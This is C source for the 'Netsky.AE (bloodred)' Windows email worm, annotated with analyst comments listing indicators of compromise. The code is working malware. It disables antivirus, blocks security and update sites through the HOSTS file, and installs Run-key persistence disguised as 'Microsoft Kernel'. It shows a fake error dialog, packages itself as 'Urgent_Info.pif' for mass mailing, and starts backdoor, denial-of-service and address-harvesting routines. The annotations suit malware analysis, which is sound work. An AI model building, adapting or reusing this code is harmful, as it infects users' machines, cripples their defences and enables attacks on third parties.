  1. /**************************************************
  2. *            Netsky.AE(bloodred)
  3. *
  4. *   Project History:
  5. *        Main idea - November 2003
  6. *        Initial design - December 2003
  7. *        First half of virus completed - February 2004
  8. *        Retrieved project source code; import to GIT repo;
  9. *        added Linux env build Makefile; added missing libs
  10. *        (advapi32, user32, shell32) to allow compilation;
  11. *        see GIT history for any (possible?) future changes.
  12. *
  13. */
  14.  
  15. #define WIN32_LEAN_AND_MEAN
  16.  
  17. #include <windows.h>
  18. #include <winsock.h>
  19. #include "backdoor.h"
  20. #include "KillProc.h"
  21. #include "Harvester.h"
  22. #include "ZipIt.h"
  23. #include "Base64.h"
  24. #include "DOS.h"
  25. #include <stdio.h>
  26.  
  27. #pragma comment (lib,"ws2_32.lib")
  28. #pragma comment (lib,"AdvAPI32.Lib")
  29. #pragma comment (lib,"User32.Lib")
  30. #pragma comment (lib,"Shell32.Lib")
  31.  
  32.  
  33.  
// Decoy string compiled into the binary. It is not referenced anywhere on
// this page; the two adjacent literals concatenate into a single array
// element. For analysts it is a static attribution/signature artifact only.
static const char *szMsg[] = {

        "Live life as it is or live life as it comes. "
            "Written by Jackhole"


    };
// Despite the name this terminates nothing: it creates, and keeps owning
// (bInitialOwner = TRUE, handles never closed), a list of named mutexes.
// Each name appears to be the single-instance mutex of another Netsky/Sasser
// variant, so a variant that performs the usual CreateMutexA +
// ERROR_ALREADY_EXISTS check (the same one bldred_mutex() applies to this
// sample's own name) would exit while this process is alive. For responders,
// every name below is a host-level indicator that can be enumerated on a
// live system.
void kill_skynet()
{
    CreateMutexA(NULL, TRUE, "AdmMoodownJKIS003");
    CreateMutexA(NULL, TRUE, "(S)(k)(y)(N)(e)(t)");
    CreateMutexA(NULL, TRUE, "____--->>>>U<<<<--____");
    CreateMutexA(NULL, TRUE, "NetDy_Mutex_Psycho");
    CreateMutexA(NULL, TRUE, "_-=oOOSOkOyONOeOtOo=-_");
    CreateMutexA(NULL, TRUE, "SyncMutex_USUkUyUnUeUtUU");
    CreateMutexA(NULL, TRUE, "SyncMutex_USUkUyUnUeUtU");
    CreateMutexA(NULL, TRUE, "Protect_USUkUyUnUeUtU_Mutex");
    CreateMutexA(NULL, TRUE, "89845848594808308439858307378280987074387498739847");
    CreateMutexA(NULL, TRUE, "_-oOaxX|-+S+-+k+-+y+-+N+-+e+-+t+-|XxKOo-_");
    CreateMutexA(NULL, TRUE, "_-oO]xX|-S-k-y-N-e-t-|Xx[Oo-_");
    CreateMutexA(NULL, TRUE, "Bgl_*L*o*o*s*e*");
    // "NetDy_Mutex_Psycho" is requested a second time here; the call only
    // yields ERROR_ALREADY_EXISTS and another handle to the same object.
    CreateMutexA(NULL, TRUE, "NetDy_Mutex_Psycho");
    CreateMutexA(NULL, TRUE, "Rabbo_Mutex");
    CreateMutexA(NULL, TRUE, "Rabbo");
    CreateMutexA(NULL, TRUE, "SkYnEt_AVP");
    CreateMutexA(NULL, TRUE, "KO[SkyNet.cz]SystemsMutex");
    CreateMutexA(NULL, TRUE, "MI[SkyNet.cz]SystemsMutex");
    CreateMutexA(NULL, TRUE, "Netsky AV Guard");
    CreateMutexA(NULL, TRUE, "LK[SkyNet.cz]SystemsMutex");
    CreateMutexA(NULL, TRUE, "[SkyNet.cz]SystemsMutex");
    CreateMutexA(NULL, TRUE, "AdmSkynetJKIS003");
CreateMutexA(NULL, TRUE, "SkyNet-Sasser");
    CreateMutexA(NULL, TRUE, "S-k-y-n-e-t--A-n-t-i-v-i-r-u-s-T-e-a-m");
CreateMutexA(NULL, TRUE, "MuXxXxTENYKSDesignedAsTheFollowerOfSkynet-D");
CreateMutexA(NULL, TRUE, "Jobaka3");
CreateMutexA(NULL, TRUE, "Jobaka3l");
CreateMutexA(NULL, TRUE, "JumpallsNlsTillt");
CreateMutexA(NULL, TRUE, "SkynetSasserVersionWithPingFast");
CreateMutexA(NULL, TRUE, "SkynetNotice");
CreateMutexA(NULL, TRUE, "'D'r'o'p'p'e'd'S'k'y'N'e't'");

}
  78.  
  79.  
// Replaces the system HOSTS file so the listed security-vendor, update and
// search domains resolve to 127.0.0.1 (blocking AV updates and lookups).
// Target is <system dir>\Drivers\ETC\HOSTS, opened with CREATE_ALWAYS, so any
// existing content is discarded. A HOSTS file containing this exact string is
// a high-confidence indicator of this sample.
void host(void)
{

// Path is built by unbounded strcat; MAX_PATH only leaves room for the suffix
// when the system directory path is short enough.
char host[MAX_PATH];

GetSystemDirectory(host, sizeof(host));

strcat(host, "\\Drivers\\ETC\\HOSTS");

    // All entries sit on one space-separated line rather than one per line;
    // how the resolver parses that layout is not established here.
    const char* buffer = "127.0.0.1 www.norton.com 127.0.0.1 norton.com 127.0.0.1 yahoo.com 127.0.0.1 www.yahoo.com 127.0.0.1 microsoft.com 127.0.0.1 www.microsoft.com 127.0.0.1 windowsupdate.com 127.0.0.1 www.windowsupdate.com 127.0.0.1 www.mcafee.com 127.0.0.1 mcafee.com 127.0.0.1 www.nai.com 127.0.0.1 nai.com 127.0.0.1 www.ca.com 127.0.0.1 ca.com 127.0.0.1 liveupdate.symantec.com 127.0.0.1 www.sophos.com 127.0.0.1 www.google.com 127.0.0.1 google.com";



DWORD byte;
// hFile is never validated: if the open fails (e.g. no write access to the
// system directory) INVALID_HANDLE_VALUE goes straight into WriteFile, which
// then fails and the existing HOSTS file is left untouched.
HANDLE hFile = CreateFile(host, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
BOOL bSuccess = WriteFile ( hFile, buffer, strlen(buffer), &byte, NULL); // bSuccess is never examined
CloseHandle(hFile);


}
  101.  
  102.  
// Persistence: copies the running executable to <system dir>\Windows_kernel32.exe
// and registers that path as the REG_SZ value "Microsoft Kernel" under
// HKLM\Software\Microsoft\Windows\CurrentVersion\Run. The dropped file name
// and that Run value are the persistence artifacts to look for during triage.
void bldred_install()
{
    char pathname[256];
char windir[MAX_PATH];
char bldred_instpath[MAX_PATH];

GetSystemDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256); // nRet is never checked

strcat(windir, "\\Windows_kernel32.exe");
CopyFile(pathname,windir,0); // bFailIfExists = 0: an earlier copy is overwritten; result ignored

lstrcpy(bldred_instpath,windir);

// The install path (up to MAX_PATH bytes) is copied into a 60-byte buffer with
// an unbounded strcpy, and the registry value is written with the buffer's
// full size rather than the string length, so the stored value can carry
// bytes past the terminator.
char buffer[60];
unsigned long size = sizeof(buffer);
strcpy(buffer, bldred_instpath);
HKEY software;
HKEY mykey;
// Return codes of the registry calls are not checked. The key path carries a
// trailing backslash; whether RegCreateKey accepts it is not verified here.
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\",&software);
RegCreateKey(software,"Run",&mykey);
RegSetValueEx(mykey,"Microsoft Kernel",NULL,REG_SZ,(LPBYTE)buffer,size);
RegCloseKey(mykey);
RegCloseKey(software);

}
  130.  
  131.  
// Single-instance guard for this sample: claims the named mutex
// "~~~Bloodred~~~owns~~~you~~~xoxo~~~2004" and exits with code 0 if it
// already exists. In bldred_main() this runs only after endAvSoft(), the
// optional DoS thread and bldred_mail_install(), so a duplicate instance
// repeats those steps before exiting. Returns 0 for the instance that
// survives; the mutex handle is never closed.
int bldred_mutex()
{
    CreateMutexA(NULL, TRUE, "~~~Bloodred~~~owns~~~you~~~xoxo~~~2004");
if (GetLastError() == ERROR_ALREADY_EXISTS)
ExitProcess(0);
return 0;
}
// Shows the fake "Windows encountered an error reading the file" dialog once:
// it appears only when <system dir>\frun.txt cannot be opened, and the file is
// then (re)written unconditionally with the marker text "Here's Johnny :)",
// so later runs stay silent. The marker file is a useful first-run artifact.
void msg()
{

    char host[MAX_PATH];
GetSystemDirectory(host, sizeof(host));
strcat(host, "\\frun.txt");
FILE* fin;
        fin = fopen(host,"rb");
    if (fin==NULL)
MessageBox(NULL,"Windows encountered an error reading the file","Error",MB_OK|MB_ICONERROR);
    // When the fopen succeeded, fin is never fclose()d; it is still open when
    // CreateFile below requests exclusive access (dwShareMode 0), which may
    // make that open fail on subsequent runs - not confirmed here.
    const char* buffer = "Here's Johnny :)"; //just a message within frun.txt
    DWORD byte;
HANDLE hFile = CreateFile(host, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); // handle not validated
BOOL bSuccess = WriteFile (hFile, buffer, strlen(buffer), &byte, NULL); // bSuccess unused
CloseHandle(hFile);

}
// Stages the mail-propagation payload. Drops a copy of the running executable
// to <system dir>\bloodred.exe, stores that executable into
// %windir%\bloodred.zip under the inner name "Urgent_Info.pif", then
// base64-encodes the zip into <system dir>\base64zip.sys and again into
// <system dir>\base64exe.sys. zip_store() and EncodeBase64() are presumably
// the helpers declared in ZipIt.h / Base64.h; their contracts are not visible
// here. Both EncodeBase64 calls take the zip (windir) as input, so
// base64exe.sys also holds the encoded zip rather than the bare executable.
// All four dropped file names are on-disk indicators; no return value in this
// function is checked.
void bldred_mail_install()
{

    // 100-byte buffers for system-directory paths (MAX_PATH elsewhere in this
    // file); the strcat calls below apply no bound.
    char systemdir[100];
    char systemdir2[100];
    char systemdir3[100];

    GetSystemDirectory(systemdir,sizeof(systemdir));
    GetSystemDirectory(systemdir2,sizeof(systemdir2));
    GetSystemDirectory(systemdir3,sizeof(systemdir3));
    strcat(systemdir,"\\bloodred.exe");
    strcat(systemdir2,"\\base64zip.sys");
    strcat(systemdir3,"\\base64exe.sys");
    char buf3[260];
    char windir[260];
    GetWindowsDirectory(windir,sizeof(windir));
    GetModuleFileName(NULL,buf3,MAX_PATH); // path of the running image
CopyFile(buf3,systemdir,0); // overwrite allowed; result ignored
strcat(windir,"\\bloodred.zip");
zip_store(buf3,windir,"Urgent_Info.pif");
EncodeBase64(windir,systemdir2);
EncodeBase64(windir,systemdir3);
}
  180.  
// Date trigger for the DoS thread (the original comment names kazaa.com as the
// target; DOSATTACK itself lives in DOS.h and is not on this page). termdate is
// 2004-10-11 16:38:43 in SYSTEMTIME field order (year, month, day-of-week, day,
// hour, minute, second); the trailing wMilliseconds is zero-initialised and
// wDayOfWeek is ignored by SystemTimeToFileTime. Returns 1 when the current
// system time (UTC, from GetSystemTimeAsFileTime) is strictly later than that
// instant, else 0, comparing the high then the low DWORD of the 64-bit
// FILETIME. On any present-day clock this is always 1, so bldred_main()
// always starts the attack thread. Neither time call's result is checked.
int chk_dos_date()
{
    static const SYSTEMTIME termdate = { 2004,10,0,11,   16,38,43 };
    FILETIME ftime_c, ftime_f;
    GetSystemTimeAsFileTime(&ftime_c);
    SystemTimeToFileTime(&termdate, &ftime_f);
    if (ftime_c.dwHighDateTime > ftime_f.dwHighDateTime) return 1;
    if (ftime_c.dwHighDateTime < ftime_f.dwHighDateTime) return 0;
    if (ftime_c.dwLowDateTime > ftime_f.dwLowDateTime) return 1;
    return 0; // equal instants count as "not yet"
}
  194.  
  195.  
// Orchestrates the infection sequence in this fixed order:
//   1. endAvSoft()           - presumably from KillProc.h; body not on this page
//   2. DOSATTACK thread      - only when chk_dos_date() reports the trigger date passed
//   3. bldred_mail_install() - drops the mail payload files
//   4. bldred_mutex()        - single-instance check; a duplicate exits here
//   5. listening thread      - presumably the backdoor from backdoor.h
//   6. msg()                 - fake error dialog on first run
//   7. kill_skynet()         - claims rival variants' mutexes
//   8. bldred_install()      - Run-key persistence
//   9. host()                - HOSTS file overwrite
//  10. harvest_main()        - presumably the address harvester from Harvester.h
// Steps 1-3 run before the mutex check, so a duplicate instance still performs
// them. Both CreateThread handles are discarded, and the thread ids (pl, tid)
// are written but never read.
void bldred_main()

{

 DWORD pl;
 DWORD tid;

    endAvSoft();
    //if the date is passed the 11th create the dos attack thread
    if(chk_dos_date()) CreateThread(0, 0, DOSATTACK, NULL, 0, &tid);
    bldred_mail_install();
 bldred_mutex();
    CreateThread(0, 0, listening, NULL, 0, &pl);
    msg();
        kill_skynet();
    bldred_install();
   host();
harvest_main();

}
  216.  
// Process entry point. Initialises Winsock 2.0 (result unchecked) and hands
// off to bldred_main(). WSACleanup() is never called, and the function falls
// off its end without returning a value.
int _stdcall WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow)
{
//startup: Windows Socket Library
    WSADATA data;
    WSAStartup(MAKEWORD(2,0), &data);
    bldred_main();
}
  225.  